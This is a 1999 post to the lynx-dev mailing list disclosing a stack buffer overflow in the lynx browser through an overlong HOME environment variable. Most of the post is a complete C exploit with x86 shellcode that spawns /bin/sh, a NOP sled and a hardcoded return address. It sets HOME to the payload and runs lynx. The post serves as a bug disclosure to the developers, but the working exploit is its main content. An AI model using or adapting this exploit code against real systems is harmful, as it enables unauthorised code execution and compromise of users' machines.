[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
lynx-dev lynx getenv() overflow
|
From: |
jorge |
|
Subject: |
lynx-dev lynx getenv() overflow |
|
Date: |
Mon, 18 Jan 1999 04:05:30 -0600 (CST) |
Hi.
Fix your bugs.
It segfaults when you set your HOME env variable to 260 characters or
more. It is exploitable, though I don't see why you'd want to, but I wrote
it to those who are nonbelievers.
/* thank u duke, horizon, i love u guys.
*
* linux lynx overflow. what is it for? example code.
* my linux 2.0.35 boxen lynx 2.6 but i know that 2.8 is vuln as well
* because i did it on a debian system with lynx 2.8. Have a nice day.
*
* jorge - b4b0
* Sun Jan 17 03:30:00 CST 1999
*/
#include <stdio.h>
#include <unistd.h>
#define RET 0xbffffcac
#define SZ 200
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(argc, argv)
int argc;
char * argv[];
{
int i, offset;
char buf[300];
if (argc == 2) offset = atoi(argv[1]);
for (i = 0 ; i < sizeof(buf) - 4 ; i += 4)
*(long *)&buf[i] = RET;
memset(buf, 0x90, SZ);
memcpy(buf + (SZ - strlen(shellcode)), shellcode, strlen(shellcode));
printf("using addr: %#x\n",RET);
setenv("HOME", buf , 1);
execl("/usr/bin/lynx","lynx",NULL);
printf("failed. :(\n");
}
--- end code
If you already fixed this bug, I'm sorry.
Let's hear a reply,
-------------------
| jorge / b4b0. |
| address@hidden |
-------------------
- lynx-dev lynx getenv() overflow,
jorge <=